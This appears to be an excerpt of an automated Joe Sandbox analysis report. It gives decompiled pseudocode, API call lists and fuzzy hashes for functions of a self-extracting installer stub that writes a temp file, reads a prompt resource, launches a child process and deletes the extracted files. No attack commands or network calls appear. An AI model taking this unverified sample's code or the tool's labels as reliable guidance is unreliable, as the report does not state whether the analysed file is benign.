                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836923961-0
                                                                                                                                                                                                      • Opcode ID: 699f2fc8c4ae4cf97f6d5042b8db4bc3082b184d4e260011aaeea12a963277cd
                                                                                                                                                                                                      • Instruction ID: 5698b6d453f323d421ad9db6f387c85aaf8147f2052ccfcc007bf992f43eb52a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 699f2fc8c4ae4cf97f6d5042b8db4bc3082b184d4e260011aaeea12a963277cd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5411930A443D4CFEB609B6AFD447AE77E4EB54B90F14402AE945FB291CF794880CB41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 631 e58c8-e58d5 632 e58d8-e58dd 631->632 632->632 633 e58df-e58f1 LocalAlloc 632->633 634 e5919-e5959 call e1680 call e658a CreateFileA LocalFree 633->634 635 e58f3-e5901 call e44b9 633->635 638 e5906-e5910 call e6285 634->638 645 e595b-e596c CloseHandle GetFileAttributesA 634->645 635->638 644 e5912-e5918 638->644 645->638 646 e596e-e5970 645->646 646->638 647 e5972-e597b 646->647 647->644
                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E000E58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				signed char _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                                                                      				CHAR* _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                                                                      				_t23 = __ecx + 1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t6 =  *_t27;
                                                                                                                                                                                                      					_t27 = _t27 + 1;
                                                                                                                                                                                                      				} while (_t6 != 0);
                                                                                                                                                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                      				if(_t20 != 0) {
                                                                                                                                                                                                      					E000E1680(_t20, _t36, _t33);
                                                                                                                                                                                                      					E000E658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                      					_v8 = _t10;
                                                                                                                                                                                                      					LocalFree(_t20);
                                                                                                                                                                                                      					_t12 = _v8;
                                                                                                                                                                                                      					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						CloseHandle(_t12);
                                                                                                                                                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xe9124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E000E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					 *0xe9124 = E000E6285();
                                                                                                                                                                                                      					_t14 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x000e58cd
                                                                                                                                                                                                      0x000e58d1
                                                                                                                                                                                                      0x000e58d3
                                                                                                                                                                                                      0x000e58d5
                                                                                                                                                                                                      0x000e58d8
                                                                                                                                                                                                      0x000e58d8
                                                                                                                                                                                                      0x000e58da
                                                                                                                                                                                                      0x000e58db
                                                                                                                                                                                                      0x000e58e1
                                                                                                                                                                                                      0x000e58ed
                                                                                                                                                                                                      0x000e58f1
                                                                                                                                                                                                      0x000e591e
                                                                                                                                                                                                      0x000e592c
                                                                                                                                                                                                      0x000e5943
                                                                                                                                                                                                      0x000e594a
                                                                                                                                                                                                      0x000e594d
                                                                                                                                                                                                      0x000e5953
                                                                                                                                                                                                      0x000e5959
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e595b
                                                                                                                                                                                                      0x000e595c
                                                                                                                                                                                                      0x000e5963
                                                                                                                                                                                                      0x000e596c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5972
                                                                                                                                                                                                      0x000e5974
                                                                                                                                                                                                      0x000e597a
                                                                                                                                                                                                      0x000e597a
                                                                                                                                                                                                      0x000e596c
                                                                                                                                                                                                      0x000e58f3
                                                                                                                                                                                                      0x000e5901
                                                                                                                                                                                                      0x000e5906
                                                                                                                                                                                                      0x000e590b
                                                                                                                                                                                                      0x000e5910
                                                                                                                                                                                                      0x000e5910
                                                                                                                                                                                                      0x000e5918

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,000E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E58E7
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,000E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5943
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,000E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E594D
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,000E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E595C
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,000E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5963
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                      • API String ID: 747627703-3451089282
                                                                                                                                                                                                      • Opcode ID: d3fb3c2f361384cfece0e084d39eb3d811b5a2c8d7d44c7250f267616e299021
                                                                                                                                                                                                      • Instruction ID: 77d16b412b8395c13946b96d65f5a21a32616090205495828f7b5559dc596d4c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3fb3c2f361384cfece0e084d39eb3d811b5a2c8d7d44c7250f267616e299021
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32112671700650AFD7245F7B6C8DADB7E9DDF8A764B100A15B505F72D2CA749C0582A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 675 e3fef-e4010 676 e410a-e411a call e6ce0 675->676 677 e4016-e403b CreateProcessA 675->677 678 e40c4-e4101 call e6285 GetLastError FormatMessageA call e44b9 677->678 679 e4041-e406e WaitForSingleObject GetExitCodeProcess 677->679 691 e4106 678->691 681 e4070-e4077 679->681 682 e4091 call e411b 679->682 681->682 686 e4079-e407b 681->686 690 e4096-e40b8 CloseHandle * 2 682->690 686->682 689 e407d-e4089 686->689 689->682 692 e408b 689->692 693 e40ba-e40c0 690->693 694 e4108 690->694 691->694 692->682 693->694 695 e40c2 693->695 694->676 695->691
                                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                                      			E000E3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v524;
                                                                                                                                                                                                      				long _v528;
                                                                                                                                                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t20;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				int _t25;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t45 = __edx;
                                                                                                                                                                                                      				_t20 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                      				_t39 = __ecx;
                                                                                                                                                                                                      				_t49 = 1;
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				if(__ecx == 0) {
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return E000E6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                      				if(_t25 == 0) {
                                                                                                                                                                                                      					 *0xe9124 = E000E6285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                      					_t45 = 0x4c4;
                                                                                                                                                                                                      					E000E44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					_t49 = 0;
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t22 = _t49;
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                      				_t44 = _v528;
                                                                                                                                                                                                      				_t53 =  *0xe8a28; // 0x0
                                                                                                                                                                                                      				if(_t53 == 0) {
                                                                                                                                                                                                      					_t34 =  *0xe9a2c; // 0x0
                                                                                                                                                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                      						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                      							 *0xe9a2c = _t44;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E000E411B(_t34, _t44);
                                                                                                                                                                                                      				CloseHandle(_v544.hThread);
                                                                                                                                                                                                      				CloseHandle(_v544);
                                                                                                                                                                                                      				if(( *0xe9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x000e3fef
                                                                                                                                                                                                      0x000e3ffa
                                                                                                                                                                                                      0x000e4001
                                                                                                                                                                                                      0x000e4008
                                                                                                                                                                                                      0x000e400a
                                                                                                                                                                                                      0x000e400b
                                                                                                                                                                                                      0x000e4010
                                                                                                                                                                                                      0x000e410a
                                                                                                                                                                                                      0x000e411a
                                                                                                                                                                                                      0x000e411a
                                                                                                                                                                                                      0x000e401c
                                                                                                                                                                                                      0x000e401d
                                                                                                                                                                                                      0x000e401e
                                                                                                                                                                                                      0x000e401f
                                                                                                                                                                                                      0x000e4033
                                                                                                                                                                                                      0x000e403b
                                                                                                                                                                                                      0x000e40ca
                                                                                                                                                                                                      0x000e40e9
                                                                                                                                                                                                      0x000e40f8
                                                                                                                                                                                                      0x000e4101
                                                                                                                                                                                                      0x000e4106
                                                                                                                                                                                                      0x000e4106
                                                                                                                                                                                                      0x000e4108
                                                                                                                                                                                                      0x000e4108
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4108
                                                                                                                                                                                                      0x000e4049
                                                                                                                                                                                                      0x000e405c
                                                                                                                                                                                                      0x000e4062
                                                                                                                                                                                                      0x000e4068
                                                                                                                                                                                                      0x000e406e
                                                                                                                                                                                                      0x000e4070
                                                                                                                                                                                                      0x000e4077
                                                                                                                                                                                                      0x000e407f
                                                                                                                                                                                                      0x000e4089
                                                                                                                                                                                                      0x000e408b
                                                                                                                                                                                                      0x000e408b
                                                                                                                                                                                                      0x000e4089
                                                                                                                                                                                                      0x000e4077
                                                                                                                                                                                                      0x000e4091
                                                                                                                                                                                                      0x000e409c
                                                                                                                                                                                                      0x000e40a8
                                                                                                                                                                                                      0x000e40b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e40c2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e40c2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 000E4033
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000E4049
                                                                                                                                                                                                      • GetExitCodeProcess.KERNELBASE ref: 000E405C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000E409C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000E40A8
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000E40DC
                                                                                                                                                                                                      • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 000E40E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3183975587-0
                                                                                                                                                                                                      • Opcode ID: a4e92ee00df4ce56f6ea2471b9008fb7d03948839a21be35a31185264f688350
                                                                                                                                                                                                      • Instruction ID: dc25a7eec2d2637f498bfd5f50f1fe32d566c1c9a41ceddf02877f73de37bf60
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4e92ee00df4ce56f6ea2471b9008fb7d03948839a21be35a31185264f688350
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF31D431640288AFFB609F66DC88FAB77BCEBD9B10F1001A9F605F61A1C6345C85CB51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E51E5(void* __eflags) {
                                                                                                                                                                                                      				int _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = E000E468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				if(_t28 != 0) {
                                                                                                                                                                                                      					if(E000E468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                      						if(_t5 != 0) {
                                                                                                                                                                                                      							_t6 = E000E44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                      							LocalFree(_t28);
                                                                                                                                                                                                      							if(_t6 != 6) {
                                                                                                                                                                                                      								 *0xe9124 = 0x800704c7;
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *0xe9124 = 0;
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t28);
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E000E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree(_t28);
                                                                                                                                                                                                      					 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E000E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xe9124 = E000E6285();
                                                                                                                                                                                                      				goto L10;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      0x000e51fb
                                                                                                                                                                                                      0x000e5207
                                                                                                                                                                                                      0x000e520b
                                                                                                                                                                                                      0x000e523c
                                                                                                                                                                                                      0x000e5268
                                                                                                                                                                                                      0x000e5270
                                                                                                                                                                                                      0x000e528b
                                                                                                                                                                                                      0x000e5293
                                                                                                                                                                                                      0x000e529c
                                                                                                                                                                                                      0x000e52a6
                                                                                                                                                                                                      0x000e52b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e52b0
                                                                                                                                                                                                      0x000e529e
                                                                                                                                                                                                      0x000e5279
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e527b
                                                                                                                                                                                                      0x000e5273
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5273
                                                                                                                                                                                                      0x000e524a
                                                                                                                                                                                                      0x000e5250
                                                                                                                                                                                                      0x000e5256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5256
                                                                                                                                                                                                      0x000e5219
                                                                                                                                                                                                      0x000e5223
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000E2F4D,?,00000002,00000000), ref: 000E5201
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 000E5250
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                        • Part of subcall function 000E6285: GetLastError.KERNEL32(000E5BBC), ref: 000E6285
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$UPROMPT
                                                                                                                                                                                                      • API String ID: 957408736-2980973527
                                                                                                                                                                                                      • Opcode ID: 1d9025259bc6dd7b875d283f370e6f86bd130264de7a53bce3ea68f115f1f3cd
                                                                                                                                                                                                      • Instruction ID: ed7bf341db8f05563bd5b1299664b16c2865fd3bd36cf9fda8bf0b86bd536db7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d9025259bc6dd7b875d283f370e6f86bd130264de7a53bce3ea68f115f1f3cd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA11E2B13006C1AFE3646B739C89B7B62DDDB8EB95B10482DB702FA2D1DA7D9C005125
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                      			E000E52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR** _t31;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 = __edi;
                                                                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_t31 =  *0xe91e0; // 0x2d77c60
                                                                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t29 = _t31;
                                                                                                                                                                                                      						if( *0xe8a24 == 0 &&  *0xe9a30 == 0) {
                                                                                                                                                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                      							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t31 = _t31[1];
                                                                                                                                                                                                      						LocalFree( *_t29);
                                                                                                                                                                                                      						LocalFree(_t29);
                                                                                                                                                                                                      					} while (_t31 != 0);
                                                                                                                                                                                                      					_pop(_t28);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 =  *0xe8a20; // 0x0
                                                                                                                                                                                                      				_pop(_t32);
                                                                                                                                                                                                      				if(_t11 != 0 &&  *0xe8a24 == 0 &&  *0xe9a30 == 0) {
                                                                                                                                                                                                      					_push(_t22);
                                                                                                                                                                                                      					E000E1781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                      					if(( *0xe9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                      						E000E65E8( &_v268);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                      					_t22 =  &_v268;
                                                                                                                                                                                                      					E000E2390( &_v268);
                                                                                                                                                                                                      					_t11 =  *0xe8a20; // 0x0
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *0xe9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                      					_t11 = E000E1FE1(_t22); // executed
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *0xe8a20 =  *0xe8a20 & 0x00000000;
                                                                                                                                                                                                      				return E000E6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x000e52b6
                                                                                                                                                                                                      0x000e52b6
                                                                                                                                                                                                      0x000e52b6
                                                                                                                                                                                                      0x000e52c1
                                                                                                                                                                                                      0x000e52c8
                                                                                                                                                                                                      0x000e52cb
                                                                                                                                                                                                      0x000e52cc
                                                                                                                                                                                                      0x000e52d4
                                                                                                                                                                                                      0x000e52d6
                                                                                                                                                                                                      0x000e52d7
                                                                                                                                                                                                      0x000e52de
                                                                                                                                                                                                      0x000e52e0
                                                                                                                                                                                                      0x000e52f2
                                                                                                                                                                                                      0x000e52fa
                                                                                                                                                                                                      0x000e52fa
                                                                                                                                                                                                      0x000e5302
                                                                                                                                                                                                      0x000e5305
                                                                                                                                                                                                      0x000e530c
                                                                                                                                                                                                      0x000e5312
                                                                                                                                                                                                      0x000e5316
                                                                                                                                                                                                      0x000e5316
                                                                                                                                                                                                      0x000e5317
                                                                                                                                                                                                      0x000e531c
                                                                                                                                                                                                      0x000e531f
                                                                                                                                                                                                      0x000e5333
                                                                                                                                                                                                      0x000e5345
                                                                                                                                                                                                      0x000e5351
                                                                                                                                                                                                      0x000e5359
                                                                                                                                                                                                      0x000e5359
                                                                                                                                                                                                      0x000e5363
                                                                                                                                                                                                      0x000e5369
                                                                                                                                                                                                      0x000e536f
                                                                                                                                                                                                      0x000e5374
                                                                                                                                                                                                      0x000e5374
                                                                                                                                                                                                      0x000e5381
                                                                                                                                                                                                      0x000e5387
                                                                                                                                                                                                      0x000e5387
                                                                                                                                                                                                      0x000e538f
                                                                                                                                                                                                      0x000e53a0

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(02D77C60,00000080,?,00000000), ref: 000E52F2
                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(02D77C60), ref: 000E52FA
                                                                                                                                                                                                      • LocalFree.KERNEL32(02D77C60,?,00000000), ref: 000E5305
                                                                                                                                                                                                      • LocalFree.KERNEL32(02D77C60), ref: 000E530C
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(000E11FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E5363
                                                                                                                                                                                                      Strings
